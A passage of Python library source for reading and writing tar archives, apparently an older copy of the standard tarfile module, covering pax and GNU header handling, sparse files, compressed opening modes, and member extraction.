pax_headers: # The pax header has priority. continue # Try to encode the string as ASCII. try: info[name].encode("ascii", "strict") except UnicodeEncodeError: pax_headers[hname] = info[name] continue if len(info[name]) > length: pax_headers[hname] = info[name] # Test number fields for values that exceed the field limit or values # that like to be stored as float. for name, digits in (("uid", 8), ("gid", 8), ("size", 12), ("mtime", 12)): if name in pax_headers: # The pax header has priority. Avoid overflow. info[name] = 0 continue val = info[name] if not 0 <= val < 8 ** (digits - 1) or isinstance(val, float): pax_headers[name] = str(val) info[name] = 0 # Create a pax extended header if necessary. if pax_headers: buf = self._create_pax_generic_header(pax_headers, XHDTYPE, encoding) else: buf = b"" return buf + self._create_header(info, USTAR_FORMAT, "ascii", "replace") @classmethod def create_pax_global_header(cls, pax_headers): """Return the object as a pax global header block sequence. """ return cls._create_pax_generic_header(pax_headers, XGLTYPE, "utf8") def _posix_split_name(self, name): """Split a name longer than 100 chars into a prefix and a name part. """ prefix = name[:LENGTH_PREFIX + 1] while prefix and prefix[-1] != "/": prefix = prefix[:-1] name = name[len(prefix):] prefix = prefix[:-1] if not prefix or len(name) > LENGTH_NAME: raise ValueError("name is too long") return prefix, name @staticmethod def _create_header(info, format, encoding, errors): """Return a header block. info is a dictionary with file information, format must be one of the *_FORMAT constants. """ parts = [ stn(info.get("name", ""), 100, encoding, errors), itn(info.get("mode", 0) & 0o7777, 8, format), itn(info.get("uid", 0), 8, format), itn(info.get("gid", 0), 8, format), itn(info.get("size", 0), 12, format), itn(info.get("mtime", 0), 12, format), b" ", # checksum field info.get("type", REGTYPE), stn(info.get("linkname", ""), 100, encoding, errors), info.get("magic", POSIX_MAGIC), stn(info.get("uname", ""), 32, encoding, errors), stn(info.get("gname", ""), 32, encoding, errors), itn(info.get("devmajor", 0), 8, format), itn(info.get("devminor", 0), 8, format), stn(info.get("prefix", ""), 155, encoding, errors) ] buf = struct.pack("%ds" % BLOCKSIZE, b"".join(parts)) chksum = calc_chksums(buf[-BLOCKSIZE:])[0] buf = buf[:-364] + ("%06o\0" % chksum).encode("ascii") + buf[-357:] return buf @staticmethod def _create_payload(payload): """Return the string payload filled with zero bytes up to the next 512 byte border. """ blocks, remainder = divmod(len(payload), BLOCKSIZE) if remainder > 0: payload += (BLOCKSIZE - remainder) * NUL return payload @classmethod def _create_gnu_long_header(cls, name, type, encoding, errors): """Return a GNUTYPE_LONGNAME or GNUTYPE_LONGLINK sequence for name. """ name = name.encode(encoding, errors) + NUL info = {} info["name"] = "././@LongLink" info["type"] = type info["size"] = len(name) info["magic"] = GNU_MAGIC # create extended header + name blocks. return cls._create_header(info, USTAR_FORMAT, encoding, errors) + \ cls._create_payload(name) @classmethod def _create_pax_generic_header(cls, pax_headers, type, encoding): """Return a POSIX.1-2008 extended or global header sequence that contains a list of keyword, value pairs. The values must be strings. """ # Check if one of the fields contains surrogate characters and thereby # forces hdrcharset=BINARY, see _proc_pax() for more information. binary = False for keyword, value in pax_headers.items(): try: value.encode("utf8", "strict") except UnicodeEncodeError: binary = True break records = b"" if binary: # Put the hdrcharset field at the beginning of the header. records += b"21 hdrcharset=BINARY\n" for keyword, value in pax_headers.items(): keyword = keyword.encode("utf8") if binary: # Try to restore the original byte representation of `value'. # Needless to say, that the encoding must match the string. value = value.encode(encoding, "surrogateescape") else: value = value.encode("utf8") l = len(keyword) + len(value) + 3 # ' ' + '=' + '\n' n = p = 0 while True: n = l + len(str(p)) if n == p: break p = n records += bytes(str(p), "ascii") + b" " + keyword + b"=" + value + b"\n" # We use a hardcoded "././@PaxHeader" name like star does # instead of the one that POSIX recommends. info = {} info["name"] = "././@PaxHeader" info["type"] = type info["size"] = len(records) info["magic"] = POSIX_MAGIC # Create pax header + record blocks. return cls._create_header(info, USTAR_FORMAT, "ascii", "replace") + \ cls._create_payload(records) @classmethod def frombuf(cls, buf, encoding, errors): """Construct a TarInfo object from a 512 byte bytes object. """ if len(buf) == 0: raise EmptyHeaderError("empty header") if len(buf) != BLOCKSIZE: raise TruncatedHeaderError("truncated header") if buf.count(NUL) == BLOCKSIZE: raise EOFHeaderError("end of file header") chksum = nti(buf[148:156]) if chksum not in calc_chksums(buf): raise InvalidHeaderError("bad checksum") obj = cls() obj.name = nts(buf[0:100], encoding, errors) obj.mode = nti(buf[100:108]) obj.uid = nti(buf[108:116]) obj.gid = nti(buf[116:124]) obj.size = nti(buf[124:136]) obj.mtime = nti(buf[136:148]) obj.chksum = chksum obj.type = buf[156:157] obj.linkname = nts(buf[157:257], encoding, errors) obj.uname = nts(buf[265:297], encoding, errors) obj.gname = nts(buf[297:329], encoding, errors) obj.devmajor = nti(buf[329:337]) obj.devminor = nti(buf[337:345]) prefix = nts(buf[345:500], encoding, errors) # Old V7 tar format represents a directory as a regular # file with a trailing slash. if obj.type == AREGTYPE and obj.name.endswith("/"): obj.type = DIRTYPE # The old GNU sparse format occupies some of the unused # space in the buffer for up to 4 sparse structures. # Save the them for later processing in _proc_sparse(). if obj.type == GNUTYPE_SPARSE: pos = 386 structs = [] for i in range(4): try: offset = nti(buf[pos:pos + 12]) numbytes = nti(buf[pos + 12:pos + 24]) except ValueError: break structs.append((offset, numbytes)) pos += 24 isextended = bool(buf[482]) origsize = nti(buf[483:495]) obj._sparse_structs = (structs, isextended, origsize) # Remove redundant slashes from directories. if obj.isdir(): obj.name = obj.name.rstrip("/") # Reconstruct a ustar longname. if prefix and obj.type not in GNU_TYPES: obj.name = prefix + "/" + obj.name return obj @classmethod def fromtarfile(cls, tarfile): """Return the next TarInfo object from TarFile object tarfile. """ buf = tarfile.fileobj.read(BLOCKSIZE) obj = cls.frombuf(buf, tarfile.encoding, tarfile.errors) obj.offset = tarfile.fileobj.tell() - BLOCKSIZE return obj._proc_member(tarfile) #-------------------------------------------------------------------------- # The following are methods that are called depending on the type of a # member. The entry point is _proc_member() which can be overridden in a # subclass to add custom _proc_*() methods. A _proc_*() method MUST # implement the following # operations: # 1. Set self.offset_data to the position where the data blocks begin, # if there is data that follows. # 2. Set tarfile.offset to the position where the next member's header will # begin. # 3. Return self or another valid TarInfo object. def _proc_member(self, tarfile): """Choose the right processing method depending on the type and call it. """ if self.type in (GNUTYPE_LONGNAME, GNUTYPE_LONGLINK): return self._proc_gnulong(tarfile) elif self.type == GNUTYPE_SPARSE: return self._proc_sparse(tarfile) elif self.type in (XHDTYPE, XGLTYPE, SOLARIS_XHDTYPE): return self._proc_pax(tarfile) else: return self._proc_builtin(tarfile) def _proc_builtin(self, tarfile): """Process a builtin type or an unknown type which will be treated as a regular file. """ self.offset_data = tarfile.fileobj.tell() offset = self.offset_data if self.isreg() or self.type not in SUPPORTED_TYPES: # Skip the following data blocks. offset += self._block(self.size) tarfile.offset = offset # Patch the TarInfo object with saved global # header information. self._apply_pax_info(tarfile.pax_headers, tarfile.encoding, tarfile.errors) return self def _proc_gnulong(self, tarfile): """Process the blocks that hold a GNU longname or longlink member. """ buf = tarfile.fileobj.read(self._block(self.size)) # Fetch the next header and process it. try: next = self.fromtarfile(tarfile) except HeaderError: raise SubsequentHeaderError("missing or bad subsequent header") # Patch the TarInfo object from the next header with # the longname information. next.offset = self.offset if self.type == GNUTYPE_LONGNAME: next.name = nts(buf, tarfile.encoding, tarfile.errors) elif self.type == GNUTYPE_LONGLINK: next.linkname = nts(buf, tarfile.encoding, tarfile.errors) return next def _proc_sparse(self, tarfile): """Process a GNU sparse header plus extra headers. """ # We already collected some sparse structures in frombuf(). structs, isextended, origsize = self._sparse_structs del self._sparse_structs # Collect sparse structures from extended header blocks. while isextended: buf = tarfile.fileobj.read(BLOCKSIZE) pos = 0 for i in range(21): try: offset = nti(buf[pos:pos + 12]) numbytes = nti(buf[pos + 12:pos + 24]) except ValueError: break if offset and numbytes: structs.append((offset, numbytes)) pos += 24 isextended = bool(buf[504]) self.sparse = structs self.offset_data = tarfile.fileobj.tell() tarfile.offset = self.offset_data + self._block(self.size) self.size = origsize return self def _proc_pax(self, tarfile): """Process an extended or global header as described in POSIX.1-2008. """ # Read the header information. buf = tarfile.fileobj.read(self._block(self.size)) # A pax header stores supplemental information for either # the following file (extended) or all following files # (global). if self.type == XGLTYPE: pax_headers = tarfile.pax_headers else: pax_headers = tarfile.pax_headers.copy() # Check if the pax header contains a hdrcharset field. This tells us # the encoding of the path, linkpath, uname and gname fields. Normally, # these fields are UTF-8 encoded but since POSIX.1-2008 tar # implementations are allowed to store them as raw binary strings if # the translation to UTF-8 fails. match = re.search(br"\d+ hdrcharset=([^\n]+)\n", buf) if match is not None: pax_headers["hdrcharset"] = match.group(1).decode("utf8") # For the time being, we don't care about anything other than "BINARY". # The only other value that is currently allowed by the standard is # "ISO-IR 10646 2000 UTF-8" in other words UTF-8. hdrcharset = pax_headers.get("hdrcharset") if hdrcharset == "BINARY": encoding = tarfile.encoding else: encoding = "utf8" # Parse pax header information. A record looks like that: # "%d %s=%s\n" % (length, keyword, value). length is the size # of the complete record including the length field itself and # the newline. keyword and value are both UTF-8 encoded strings. regex = re.compile(br"(\d+) ([^=]+)=") pos = 0 while True: match = regex.match(buf, pos) if not match: break length, keyword = match.groups() length = int(length) value = buf[match.end(2) + 1:match.start(1) + length - 1] # Normally, we could just use "utf8" as the encoding and "strict" # as the error handler, but we better not take the risk. For # example, GNU tar <= 1.23 is known to store filenames it cannot # translate to UTF-8 as raw strings (unfortunately without a # hdrcharset=BINARY header). # We first try the strict standard encoding, and if that fails we # fall back on the user's encoding and error handler. keyword = self._decode_pax_field(keyword, "utf8", "utf8", tarfile.errors) if keyword in PAX_NAME_FIELDS: value = self._decode_pax_field(value, encoding, tarfile.encoding, tarfile.errors) else: value = self._decode_pax_field(value, "utf8", "utf8", tarfile.errors) pax_headers[keyword] = value pos += length # Fetch the next header. try: next = self.fromtarfile(tarfile) except HeaderError: raise SubsequentHeaderError("missing or bad subsequent header") # Process GNU sparse information. if "GNU.sparse.map" in pax_headers: # GNU extended sparse format version 0.1. self._proc_gnusparse_01(next, pax_headers) elif "GNU.sparse.size" in pax_headers: # GNU extended sparse format version 0.0. self._proc_gnusparse_00(next, pax_headers, buf) elif pax_headers.get("GNU.sparse.major") == "1" and pax_headers.get("GNU.sparse.minor") == "0": # GNU extended sparse format version 1.0. self._proc_gnusparse_10(next, pax_headers, tarfile) if self.type in (XHDTYPE, SOLARIS_XHDTYPE): # Patch the TarInfo object with the extended header info. next._apply_pax_info(pax_headers, tarfile.encoding, tarfile.errors) next.offset = self.offset if "size" in pax_headers: # If the extended header replaces the size field, # we need to recalculate the offset where the next # header starts. offset = next.offset_data if next.isreg() or next.type not in SUPPORTED_TYPES: offset += next._block(next.size) tarfile.offset = offset return next def _proc_gnusparse_00(self, next, pax_headers, buf): """Process a GNU tar extended sparse header, version 0.0. """ offsets = [] for match in re.finditer(br"\d+ GNU.sparse.offset=(\d+)\n", buf): offsets.append(int(match.group(1))) numbytes = [] for match in re.finditer(br"\d+ GNU.sparse.numbytes=(\d+)\n", buf): numbytes.append(int(match.group(1))) next.sparse = list(zip(offsets, numbytes)) def _proc_gnusparse_01(self, next, pax_headers): """Process a GNU tar extended sparse header, version 0.1. """ sparse = [int(x) for x in pax_headers["GNU.sparse.map"].split(",")] next.sparse = list(zip(sparse[::2], sparse[1::2])) def _proc_gnusparse_10(self, next, pax_headers, tarfile): """Process a GNU tar extended sparse header, version 1.0. """ fields = None sparse = [] buf = tarfile.fileobj.read(BLOCKSIZE) fields, buf = buf.split(b"\n", 1) fields = int(fields) while len(sparse) < fields * 2: if b"\n" not in buf: buf += tarfile.fileobj.read(BLOCKSIZE) number, buf = buf.split(b"\n", 1) sparse.append(int(number)) next.offset_data = tarfile.fileobj.tell() next.sparse = list(zip(sparse[::2], sparse[1::2])) def _apply_pax_info(self, pax_headers, encoding, errors): """Replace fields with supplemental information from a previous pax extended or global header. """ for keyword, value in pax_headers.items(): if keyword == "GNU.sparse.name": setattr(self, "path", value) elif keyword == "GNU.sparse.size": setattr(self, "size", int(value)) elif keyword == "GNU.sparse.realsize": setattr(self, "size", int(value)) elif keyword in PAX_FIELDS: if keyword in PAX_NUMBER_FIELDS: try: value = PAX_NUMBER_FIELDS[keyword](value) except ValueError: value = 0 if keyword == "path": value = value.rstrip("/") setattr(self, keyword, value) self.pax_headers = pax_headers.copy() def _decode_pax_field(self, value, encoding, fallback_encoding, fallback_errors): """Decode a single field from a pax record. """ try: return value.decode(encoding, "strict") except UnicodeDecodeError: return value.decode(fallback_encoding, fallback_errors) def _block(self, count): """Round up a byte count by BLOCKSIZE and return it, e.g. _block(834) => 1024. """ blocks, remainder = divmod(count, BLOCKSIZE) if remainder: blocks += 1 return blocks * BLOCKSIZE def isreg(self): return self.type in REGULAR_TYPES def isfile(self): return self.isreg() def isdir(self): return self.type == DIRTYPE def issym(self): return self.type == SYMTYPE def islnk(self): return self.type == LNKTYPE def ischr(self): return self.type == CHRTYPE def isblk(self): return self.type == BLKTYPE def isfifo(self): return self.type == FIFOTYPE def issparse(self): return self.sparse is not None def isdev(self): return self.type in (CHRTYPE, BLKTYPE, FIFOTYPE) # class TarInfo class TarFile(object): """The TarFile Class provides an interface to tar archives. """ debug = 0 # May be set from 0 (no msgs) to 3 (all msgs) dereference = False # If true, add content of linked file to the # tar file, else the link. ignore_zeros = False # If true, skips empty or invalid blocks and # continues processing. errorlevel = 1 # If 0, fatal errors only appear in debug # messages (if debug >= 0). If > 0, errors # are passed to the caller as exceptions. format = DEFAULT_FORMAT # The format to use when creating an archive. encoding = ENCODING # Encoding for 8-bit character strings. errors = None # Error handler for unicode conversion. tarinfo = TarInfo # The default TarInfo class to use. fileobject = ExFileObject # The default ExFileObject class to use. def __init__(self, name=None, mode="r", fileobj=None, format=None, tarinfo=None, dereference=None, ignore_zeros=None, encoding=None, errors="surrogateescape", pax_headers=None, debug=None, errorlevel=None): """Open an (uncompressed) tar archive `name'. `mode' is either 'r' to read from an existing archive, 'a' to append data to an existing file or 'w' to create a new file overwriting an existing one. `mode' defaults to 'r'. If `fileobj' is given, it is used for reading or writing data. If it can be determined, `mode' is overridden by `fileobj's mode. `fileobj' is not closed, when TarFile is closed. """ if len(mode) > 1 or mode not in "raw": raise ValueError("mode must be 'r', 'a' or 'w'") self.mode = mode self._mode = {"r": "rb", "a": "r+b", "w": "wb"}[mode] if not fileobj: if self.mode == "a" and not os.path.exists(name): # Create nonexistent files in append mode. self.mode = "w" self._mode = "wb" fileobj = bltn_open(name, self._mode) self._extfileobj = False else: if name is None and hasattr(fileobj, "name"): name = fileobj.name if hasattr(fileobj, "mode"): self._mode = fileobj.mode self._extfileobj = True self.name = os.path.abspath(name) if name else None self.fileobj = fileobj # Init attributes. if format is not None: self.format = format if tarinfo is not None: self.tarinfo = tarinfo if dereference is not None: self.dereference = dereference if ignore_zeros is not None: self.ignore_zeros = ignore_zeros if encoding is not None: self.encoding = encoding self.errors = errors if pax_headers is not None and self.format == PAX_FORMAT: self.pax_headers = pax_headers else: self.pax_headers = {} if debug is not None: self.debug = debug if errorlevel is not None: self.errorlevel = errorlevel # Init datastructures. self.closed = False self.members = [] # list of members as TarInfo objects self._loaded = False # flag if all members have been read self.offset = self.fileobj.tell() # current position in the archive file self.inodes = {} # dictionary caching the inodes of # archive members already added try: if self.mode == "r": self.firstmember = None self.firstmember = self.next() if self.mode == "a": # Move to the end of the archive, # before the first empty block. while True: self.fileobj.seek(self.offset) try: tarinfo = self.tarinfo.fromtarfile(self) self.members.append(tarinfo) except EOFHeaderError: self.fileobj.seek(self.offset) break except HeaderError as e: raise ReadError(str(e)) if self.mode in "aw": self._loaded = True if self.pax_headers: buf = self.tarinfo.create_pax_global_header(self.pax_headers.copy()) self.fileobj.write(buf) self.offset += len(buf) except: if not self._extfileobj: self.fileobj.close() self.closed = True raise #-------------------------------------------------------------------------- # Below are the classmethods which act as alternate constructors to the # TarFile class. The open() method is the only one that is needed for # public use; it is the "super"-constructor and is able to select an # adequate "sub"-constructor for a particular compression using the mapping # from OPEN_METH. # # This concept allows one to subclass TarFile without losing the comfort of # the super-constructor. A sub-constructor is registered and made available # by adding it to the mapping in OPEN_METH. @classmethod def open(cls, name=None, mode="r", fileobj=None, bufsize=RECORDSIZE, **kwargs): """Open a tar archive for reading, writing or appending. Return an appropriate TarFile class. mode: 'r' or 'r:*' open for reading with transparent compression 'r:' open for reading exclusively uncompressed 'r:gz' open for reading with gzip compression 'r:bz2' open for reading with bzip2 compression 'a' or 'a:' open for appending, creating the file if necessary 'w' or 'w:' open for writing without compression 'w:gz' open for writing with gzip compression 'w:bz2' open for writing with bzip2 compression 'r|*' open a stream of tar blocks with transparent compression 'r|' open an uncompressed stream of tar blocks for reading 'r|gz' open a gzip compressed stream of tar blocks 'r|bz2' open a bzip2 compressed stream of tar blocks 'w|' open an uncompressed stream for writing 'w|gz' open a gzip compressed stream for writing 'w|bz2' open a bzip2 compressed stream for writing """ if not name and not fileobj: raise ValueError("nothing to open") if mode in ("r", "r:*"): # Find out which *open() is appropriate for opening the file. for comptype in cls.OPEN_METH: func = getattr(cls, cls.OPEN_METH[comptype]) if fileobj is not None: saved_pos = fileobj.tell() try: return func(name, "r", fileobj, **kwargs) except (ReadError, CompressionError) as e: if fileobj is not None: fileobj.seek(saved_pos) continue raise ReadError("file could not be opened successfully") elif ":" in mode: filemode, comptype = mode.split(":", 1) filemode = filemode or "r" comptype = comptype or "tar" # Select the *open() function according to # given compression. if comptype in cls.OPEN_METH: func = getattr(cls, cls.OPEN_METH[comptype]) else: raise CompressionError("unknown compression type %r" % comptype) return func(name, filemode, fileobj, **kwargs) elif "|" in mode: filemode, comptype = mode.split("|", 1) filemode = filemode or "r" comptype = comptype or "tar" if filemode not in "rw": raise ValueError("mode must be 'r' or 'w'") stream = _Stream(name, filemode, comptype, fileobj, bufsize) try: t = cls(name, filemode, stream, **kwargs) except: stream.close() raise t._extfileobj = False return t elif mode in "aw": return cls.taropen(name, mode, fileobj, **kwargs) raise ValueError("undiscernible mode") @classmethod def taropen(cls, name, mode="r", fileobj=None, **kwargs): """Open uncompressed tar archive name for reading or writing. """ if len(mode) > 1 or mode not in "raw": raise ValueError("mode must be 'r', 'a' or 'w'") return cls(name, mode, fileobj, **kwargs) @classmethod def gzopen(cls, name, mode="r", fileobj=None, compresslevel=9, **kwargs): """Open gzip compressed tar archive name for reading or writing. Appending is not allowed. """ if len(mode) > 1 or mode not in "rw": raise ValueError("mode must be 'r' or 'w'") try: import gzip gzip.GzipFile except (ImportError, AttributeError): raise CompressionError("gzip module is not available") extfileobj = fileobj is not None try: fileobj = gzip.GzipFile(name, mode + "b", compresslevel, fileobj) t = cls.taropen(name, mode, fileobj, **kwargs) except IOError: if not extfileobj and fileobj is not None: fileobj.close() if fileobj is None: raise raise ReadError("not a gzip file") except: if not extfileobj and fileobj is not None: fileobj.close() raise t._extfileobj = extfileobj return t @classmethod def bz2open(cls, name, mode="r", fileobj=None, compresslevel=9, **kwargs): """Open bzip2 compressed tar archive name for reading or writing. Appending is not allowed. """ if len(mode) > 1 or mode not in "rw": raise ValueError("mode must be 'r' or 'w'.") try: import bz2 except ImportError: raise CompressionError("bz2 module is not available") if fileobj is not None: fileobj = _BZ2Proxy(fileobj, mode) else: fileobj = bz2.BZ2File(name, mode, compresslevel=compresslevel) try: t = cls.taropen(name, mode, fileobj, **kwargs) except (IOError, EOFError): fileobj.close() raise ReadError("not a bzip2 file") t._extfileobj = False return t # All *open() methods are registered here. OPEN_METH = { "tar": "taropen", # uncompressed tar "gz": "gzopen", # gzip compressed tar "bz2": "bz2open" # bzip2 compressed tar } #-------------------------------------------------------------------------- # The public methods which TarFile provides: def close(self): """Close the TarFile. In write-mode, two finishing zero blocks are appended to the archive. """ if self.closed: return if self.mode in "aw": self.fileobj.write(NUL * (BLOCKSIZE * 2)) self.offset += (BLOCKSIZE * 2) # fill up the end with zero-blocks # (like option -b20 for tar does) blocks, remainder = divmod(self.offset, RECORDSIZE) if remainder > 0: self.fileobj.write(NUL * (RECORDSIZE - remainder)) if not self._extfileobj: self.fileobj.close() self.closed = True def getmember(self, name): """Return a TarInfo object for member `name'. If `name' can not be found in the archive, KeyError is raised. If a member occurs more than once in the archive, its last occurrence is assumed to be the most up-to-date version. """ tarinfo = self._getmember(name) if tarinfo is None: raise KeyError("filename %r not found" % name) return tarinfo def getmembers(self): """Return the members of the archive as a list of TarInfo objects. The list has the same order as the members in the archive. """ self._check() if not self._loaded: # if we want to obtain a list of self._load() # all members, we first have to # scan the whole archive. return self.members def getnames(self): """Return the members of the archive as a list of their names. It has the same order as the list returned by getmembers(). """ return [tarinfo.name for tarinfo in self.getmembers()] def gettarinfo(self, name=None, arcname=None, fileobj=None): """Create a TarInfo object for either the file `name' or the file object `fileobj' (using os.fstat on its file descriptor). You can modify some of the TarInfo's attributes before you add it using addfile(). If given, `arcname' specifies an alternative name for the file in the archive. """ self._check("aw") # When fileobj is given, replace name by # fileobj's real name. if fileobj is not None: name = fileobj.name # Building the name of the member in the archive. # Backward slashes are converted to forward slashes, # Absolute paths are turned to relative paths. if arcname is None: arcname = name drv, arcname = os.path.splitdrive(arcname) arcname = arcname.replace(os.sep, "/") arcname = arcname.lstrip("/") # Now, fill the TarInfo object with # information specific for the file. tarinfo = self.tarinfo() tarinfo.tarfile = self # Use os.stat or os.lstat, depending on platform # and if symlinks shall be resolved. if fileobj is None: if hasattr(os, "lstat") and not self.dereference: statres = os.lstat(name) else: statres = os.stat(name) else: statres = os.fstat(fileobj.fileno()) linkname = "" stmd = statres.st_mode if stat.S_ISREG(stmd): inode = (statres.st_ino, statres.st_dev) if not self.dereference and statres.st_nlink > 1 and \ inode in self.inodes and arcname != self.inodes[inode]: # Is it a hardlink to an already # archived file? type = LNKTYPE linkname = self.inodes[inode] else: # The inode is added only if its valid. # For win32 it is always 0. type = REGTYPE if inode[0]: self.inodes[inode] = arcname elif stat.S_ISDIR(stmd): type = DIRTYPE elif stat.S_ISFIFO(stmd): type = FIFOTYPE elif stat.S_ISLNK(stmd): type = SYMTYPE linkname = os.readlink(name) elif stat.S_ISCHR(stmd): type = CHRTYPE elif stat.S_ISBLK(stmd): type = BLKTYPE else: return None # Fill the TarInfo object with all # information we can get. tarinfo.name = arcname tarinfo.mode = stmd tarinfo.uid = statres.st_uid tarinfo.gid = statres.st_gid if type == REGTYPE: tarinfo.size = statres.st_size else: tarinfo.size = 0 tarinfo.mtime = statres.st_mtime tarinfo.type = type tarinfo.linkname = linkname if pwd: try: tarinfo.uname = pwd.getpwuid(tarinfo.uid)[0] except KeyError: pass if grp: try: tarinfo.gname = grp.getgrgid(tarinfo.gid)[0] except KeyError: pass if type in (CHRTYPE, BLKTYPE): if hasattr(os, "major") and hasattr(os, "minor"): tarinfo.devmajor = os.major(statres.st_rdev) tarinfo.devminor = os.minor(statres.st_rdev) return tarinfo def list(self, verbose=True): """Print a table of contents to sys.stdout. If `verbose' is False, only the names of the members are printed. If it is True, an `ls -l'-like output is produced. """ self._check() for tarinfo in self: if verbose: print(filemode(tarinfo.mode), end=' ') print("%s/%s" % (tarinfo.uname or tarinfo.uid, tarinfo.gname or tarinfo.gid), end=' ') if tarinfo.ischr() or tarinfo.isblk(): print("%10s" % ("%d,%d" \ % (tarinfo.devmajor, tarinfo.devminor)), end=' ') else: print("%10d" % tarinfo.size, end=' ') print("%d-%02d-%02d %02d:%02d:%02d" \ % time.localtime(tarinfo.mtime)[:6], end=' ') print(tarinfo.name + ("/" if tarinfo.isdir() else ""), end=' ') if verbose: if tarinfo.issym(): print("->", tarinfo.linkname, end=' ') if tarinfo.islnk(): print("link to", tarinfo.linkname, end=' ') print() def add(self, name, arcname=None, recursive=True, exclude=None, filter=None): """Add the file `name' to the archive. `name' may be any type of file (directory, fifo, symbolic link, etc.). If given, `arcname' specifies an alternative name for the file in the archive. Directories are added recursively by default. This can be avoided by setting `recursive' to False. `exclude' is a function that should return True for each filename to be excluded. `filter' is a function that expects a TarInfo object argument and returns the changed TarInfo object, if it returns None the TarInfo object will be excluded from the archive. """ self._check("aw") if arcname is None: arcname = name # Exclude pathnames. if exclude is not None: import warnings warnings.warn("use the filter argument instead", DeprecationWarning, 2) if exclude(name): self._dbg(2, "tarfile: Excluded %r" % name) return # Skip if somebody tries to archive the archive... if self.name is not None and os.path.abspath(name) == self.name: self._dbg(2, "tarfile: Skipped %r" % name) return self._dbg(1, name) # Create a TarInfo object from the file. tarinfo = self.gettarinfo(name, arcname) if tarinfo is None: self._dbg(1, "tarfile: Unsupported type %r" % name) return # Change or exclude the TarInfo object. if filter is not None: tarinfo = filter(tarinfo) if tarinfo is None: self._dbg(2, "tarfile: Excluded %r" % name) return # Append the tar header and data to the archive. if tarinfo.isreg(): f = bltn_open(name, "rb") self.addfile(tarinfo, f) f.close() elif tarinfo.isdir(): self.addfile(tarinfo) if recursive: for f in os.listdir(name): self.add(os.path.join(name, f), os.path.join(arcname, f), recursive, exclude, filter=filter) else: self.addfile(tarinfo) def addfile(self, tarinfo, fileobj=None): """Add the TarInfo object `tarinfo' to the archive. If `fileobj' is given, tarinfo.size bytes are read from it and added to the archive. You can create TarInfo objects using gettarinfo(). On Windows platforms, `fileobj' should always be opened with mode 'rb' to avoid irritation about the file size. """ self._check("aw") tarinfo = copy.copy(tarinfo) buf = tarinfo.tobuf(self.format, self.encoding, self.errors) self.fileobj.write(buf) self.offset += len(buf) # If there's data to follow, append it. if fileobj is not None: copyfileobj(fileobj, self.fileobj, tarinfo.size) blocks, remainder = divmod(tarinfo.size, BLOCKSIZE) if remainder > 0: self.fileobj.write(NUL * (BLOCKSIZE - remainder)) blocks += 1 self.offset += blocks * BLOCKSIZE self.members.append(tarinfo) def extractall(self, path=".", members=None): """Extract all members from the archive to the current working directory and set owner, modification time and permissions on directories afterwards. `path' specifies a different directory to extract to. `members' is optional and must be a subset of the list returned by getmembers(). """ directories = [] if members is None: members = self for tarinfo in members: if tarinfo.isdir(): # Extract directories with a safe mode. directories.append(tarinfo) tarinfo = copy.copy(tarinfo) tarinfo.mode = 0o700 # Do not set_attrs directories, as we will do that further down self.extract(tarinfo, path, set_attrs=not tarinfo.isdir()) # Reverse sort directories. directories.sort(key=lambda a: a.name) directories.reverse() # Set correct owner, mtime and filemode on directories. for tarinfo in directories: dirpath = os.path.join(path, tarinfo.name) try: self.chown(tarinfo, dirpath) self.utime(tarinfo, dirpath) self.chmod(tarinfo, dirpath) except ExtractError as e: if self.errorlevel > 1: raise else: self._dbg(1, "tarfile: %s" % e) def extract(self, member, path="", set_attrs=True): """Extract a member from the archive to the current working directory, using its full name. Its file information is extracted as accurately as possible. `member' may be a filename or a TarInfo object. You can specify a different directory using `path'. File attributes (owner, mtime, mode) are set unless `set_attrs' is False. """ self._check("r") if isinstance(member, str): tarinfo = self.getmember(member) else: tarinfo = member # Prepare the link target for makelink(). if tarinfo.islnk(): tarinfo._link_target = os.path.join(path, tarinfo.linkname) try: self._extract_member(tarinfo, os.path.join(path, tarinfo.name), set_attrs=set_attrs) except EnvironmentError as e: if self.errorlevel > 0: raise else: if e.filename is None: self._dbg(1, "tarfile: %s" % e.strerror) else: self._dbg(1, "tarfile: %s %r" % (e.strerror, e.filename)) except ExtractError as e: if self.errorlevel > 1: raise else: self._dbg(1, "tarfile: %s" % e) def extractfile(self, member): """Extract a member from the archive as a file object. `member' may be a filename or a TarInfo object. If `member' is a regular file, a file-like object is returned. If `member' is a link, a file-like object is constructed from the link's target. If `member' is none of the above, None is returned. The file-like object is read-only and provides the following methods: read(), readline(), readlines(), seek() and tell() """ self._check("r") if isinstance(member, str): tarinfo = self.getmember(member) else: tarinfo = member if tarinfo.isreg(): return self.fileobject(self, tarinfo) elif tarinfo.type not in SUPPORTED_TYPES: # If a member's type is unknown, it is treated as a # regular file. return self.fileobject(self, tarinfo) elif tarinfo.islnk() or tarinfo.issym(): if isinstance(self.fileobj, _Stream): # A small but ugly workaround for the case that someone tries # to extract a (sym)link as a file-object from a non-seekable # stream of tar blocks. raise StreamError("cannot extract (sym)link as file object") else: # A (sym)link's file object is its target's file object. return self.extractfile(self._find_link_target(tarinfo)) else: # If there's no data associated with the member (directory, chrdev, # blkdev, etc.), return None instead of a file object. return None def _extract_member(self, tarinfo, targetpath, set_attrs=True): """Extract the TarInfo object tarinfo to a physical file called targetpath. """ # Fetch the TarInfo object for the given name # and build the destination pathname, replacing # forward slashes to platform specific separators. targetpath = targetpath.rstrip("/") targetpath = targetpath.replace("/", os.sep) # Create all upper directories. upperdirs = os.path.dirname(targetpath) if upperdirs and not os.path.exists(upperdirs): # Create directories that are not part of the archive with # default permissions. os.makedirs(upperdirs) if tarinfo.islnk() or tarinfo.issym(): self._dbg(1, "%s -> %s" % (tarinfo.name, tarinfo.linkname)) else: self._dbg(1, tarinfo.name) if tarinfo.isreg(): self.makefile(tarinfo, targetpath) elif tarinfo.isdir(): self.makedir(tarinfo, targetpath) elif tarinfo.isfifo(): self.makefifo(tarinfo, targetpath) elif tarinfo.ischr() or tarinfo.isblk(): self.makedev(tarinfo, targetpath) elif tarinfo.islnk() or tarinfo.issym(): self.makelink(tarinfo, targetpath) elif tarinfo.type not in SUPPORTED_TYPES: self.makeunknown(tarinfo, targetpath) else: self.makefile(tarinfo, targetpath) if set_attrs: self.chown(tarinfo, targetpath) if not tarinfo.issym(): self.chmod(tarinfo, targetpath) self.utime(tarinfo, targetpath) #-------------------------------------------------------------------------- # Below are the different file methods. They are called via # _extract_member() when extract() is called. They can be replaced in a # subclass to implement other functionality. def makedir(self, tarinfo, targetpath): """Make a directory called targetpath. """ try: # Use a safe mode for the directory, the real mode is set # later in _extract_member(). os.mkdir(targetpath, 0o700) except EnvironmentError as e: if e.errno != errno.EEXIST: raise def makefile(self, tarinfo, targetpath): """Make a file called 